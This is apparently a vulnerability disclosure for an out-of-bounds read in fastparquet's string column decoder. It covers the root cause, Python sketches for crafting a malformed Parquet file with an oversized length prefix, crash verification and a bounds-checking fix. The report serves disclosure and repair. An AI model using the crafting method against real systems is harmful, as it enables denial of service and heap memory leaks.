fastparquet: out-of-bounds read in the BYTE_ARRAY (string) column decoder
This repo contains a proof-of-concept malicious Parquet file that triggers an out-of-bounds
read in fastparquet when the file is loaded, crashing the process (SIGSEGV) and potentially
disclosing adjacent heap memory.
Security PoC for a huntr Model File Format report ("Parquet"). The file is intentionally malformed and the repo is gated.
Affected
- fastparquet, confirmed on 2026.5.0 (current); the vulnerable code is unchanged on main.
- Reachable from the documented read APIs:
  - fastparquet.ParquetFile(path).to_pandas()
  - pandas.read_parquet(path, engine="fastparquet")
- Note: pandas.read_parquet uses pyarrow by default; fastparquet is used when selected via engine="fastparquet" or when pyarrow is not installed.
Root cause
fastparquet/speedups.pyx, unpack_byte_array_arrow(). PLAIN-encoded BYTE_ARRAY values are a
4-byte little-endian length prefix followed by that many bytes. The decoder reads the length and
then advances/copies that many bytes without validating the length, or the running offset,
against the end of the input buffer:
- speedups.c:21722 reads the next value's 4-byte length prefix past the buffer.
- speedups.c:22042 reads/copies the string bytes past the buffer.
The only loop guard is the value count, not the bytes consumed. A single oversized length walks the read pointer off the end of the allocation.
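The missing check can be illustrated with a small pure-Python model. This is only a sketch of the pattern described above, not the code in speedups.pyx: the helper names `encode_plain` and `trace_unchecked_reads` are hypothetical, and the model records the reads a count-guarded loop would issue rather than performing them.

```python
import struct

def encode_plain(values):
    """PLAIN-encode BYTE_ARRAY values: 4-byte little-endian length, then the bytes."""
    return b"".join(struct.pack("<I", len(v)) + v for v in values)

def trace_unchecked_reads(buf, num_values):
    """Return (offset, size, in_bounds) for each read a count-guarded loop would issue.

    Illustrative model only: reads are recorded, never performed out of bounds.
    """
    reads = []
    pos = 0
    for _ in range(num_values):              # the only guard is the value count
        in_bounds = pos + 4 <= len(buf)
        reads.append((pos, 4, in_bounds))    # read of the length prefix
        if not in_bounds:
            break                            # the model has no length to continue with
        (length,) = struct.unpack_from("<I", buf, pos)
        pos += 4
        reads.append((pos, length, pos + length <= len(buf)))  # copy of the value bytes
        pos += length                        # advanced without comparing to len(buf)
    return reads

buf = bytearray(encode_plain([b"parquet", b"ok"]))
struct.pack_into("<I", buf, 0, 0x7FFFFFFF)   # corrupt the first length prefix
for offset, size, ok in trace_unchecked_reads(bytes(buf), 2):
    print(f"read {size} bytes at offset {offset}: {'ok' if ok else 'OUT OF BOUNDS'}")
```

On the corrupted 17-byte buffer, the first prefix read is in bounds, but both the value copy and the next prefix read fall outside it, mirroring the two faulting sites listed above.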
Proof of concept
poc.parquet is an otherwise valid 848-byte single-string-column Parquet file whose first BYTE_ARRAY value has
its 4-byte length prefix patched from 7 to 0x7FFFFFFF. Loading it makes the decoder attempt to
read ~2 GiB starting inside a small heap block.
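A patch of this kind might be sketched as follows. This is not the repo's make_poc.py: the function name `patch_first_length_prefix`, the 7-byte value `abcdefg`, and the stand-in `page` bytes are all hypothetical, and the search assumes the value is stored uncompressed and PLAIN-encoded so that its length prefix sits directly in front of it.

```python
import struct

def patch_first_length_prefix(data: bytes, value: bytes, new_length: int) -> bytes:
    """Overwrite the length prefix of the first PLAIN-encoded copy of `value`."""
    needle = struct.pack("<I", len(value)) + value
    offset = data.find(needle)
    if offset < 0:
        raise ValueError(
            "length-prefixed value not found (page may be compressed or dictionary-encoded)"
        )
    patched = bytearray(data)
    struct.pack_into("<I", patched, offset, new_length)  # same size, new prefix
    return bytes(patched)

# Stand-in for a data page; a real file has page headers and a footer around it.
page = b"HDR" + struct.pack("<I", 7) + b"abcdefg" + b"TAIL"
poc = patch_first_length_prefix(page, b"abcdefg", 0x7FFFFFFF)
print(poc[3:7].hex())  # ffffff7f (0x7FFFFFFF, little-endian)
```

Because only four bytes are overwritten in place, the file size and every other byte, including the footer metadata, stay unchanged.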
pip install fastparquet pandas
python make_poc.py # writes seed.parquet and poc.parquet
python verify.py # loads poc.parquet in a child process; reports the crash
Observed on fastparquet 2026.5.0 (Linux): the child process terminates with SIGSEGV (exit -11). Under valgrind:
Invalid read of size 1
at __pyx_pf_11fastparquet_8speedups_6unpack_byte_array_arrow (speedups.c:22042)
Address 0x... is 0 bytes after a block of size 286 alloc'd
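Running the loader in a child process keeps the crash from taking down the checking script. The following is a rough sketch of that approach, not the contents of verify.py; `describe_exit` and `load_in_child` are hypothetical names, and the negative-return-code convention is the POSIX behaviour of Python's subprocess module.

```python
import signal
import subprocess
import sys

def describe_exit(returncode: int) -> str:
    """Translate a subprocess return code into a readable outcome."""
    if returncode < 0:  # POSIX: a negative code means the child was killed by a signal
        return f"killed by {signal.Signals(-returncode).name}"
    return f"exited with status {returncode}"

def load_in_child(path: str) -> int:
    """Load `path` with fastparquet in a separate interpreter; return its exit code."""
    code = "import sys, fastparquet; fastparquet.ParquetFile(sys.argv[1]).to_pandas()"
    return subprocess.run([sys.executable, "-c", code, path]).returncode

print(describe_exit(-signal.SIGSEGV))  # killed by SIGSEGV
```

With fastparquet installed, `describe_exit(load_in_child("poc.parquet"))` would be expected to report the SIGSEGV described above on an affected version.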
Impact
Loading an untrusted .parquet through fastparquet triggers an out-of-bounds read in native
(Cython-compiled) code. At minimum this is a reliable crash / denial of service at file-read
time. Because the over-read bytes are copied into the returned string column values, it can also
disclose adjacent heap memory (information leak) for reads that do not immediately fault.
Fix
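In unpack_byte_array_arrow (and unpack_byte_array), bounds-check every value against the input
buffer: confirm that 4 bytes remain before reading the length prefix, then confirm that length
bytes remain before copying the data. For example, reject the file when src_pos + 4 > buflen or,
once the prefix has been read, when length > buflen - (src_pos + 4). Comparing against the
remaining byte count avoids the overflow that src_pos + 4 + length can hit in 32-bit integer
arithmetic when length is close to 0x7FFFFFFF.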
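The two checks can be sketched in pure Python as below. This is an illustration of the validation logic only, under the assumption that a malformed page should be rejected with an error; it is not a patch for speedups.pyx, and `unpack_byte_array_checked` is a hypothetical name.

```python
import struct

def unpack_byte_array_checked(buf: bytes, num_values: int) -> list:
    """Decode PLAIN BYTE_ARRAY values, rejecting any read past the end of `buf`."""
    out = []
    pos = 0
    buflen = len(buf)
    for i in range(num_values):
        # Check 1: the 4-byte length prefix must fit in the remaining bytes.
        if buflen - pos < 4:
            raise ValueError(f"value {i}: truncated length prefix at offset {pos}")
        (length,) = struct.unpack_from("<I", buf, pos)
        pos += 4
        # Check 2: compare against the remaining byte count rather than summing offsets.
        if length > buflen - pos:
            raise ValueError(
                f"value {i}: length {length} exceeds {buflen - pos} remaining bytes"
            )
        out.append(buf[pos:pos + length])
        pos += length
    return out

good = struct.pack("<I", 7) + b"parquet" + struct.pack("<I", 2) + b"ok"
print(unpack_byte_array_checked(good, 2))  # [b'parquet', b'ok']
```

Passing a buffer whose first prefix is 0x7FFFFFFF, or asking for more values than the buffer holds, raises ValueError instead of reading past the end.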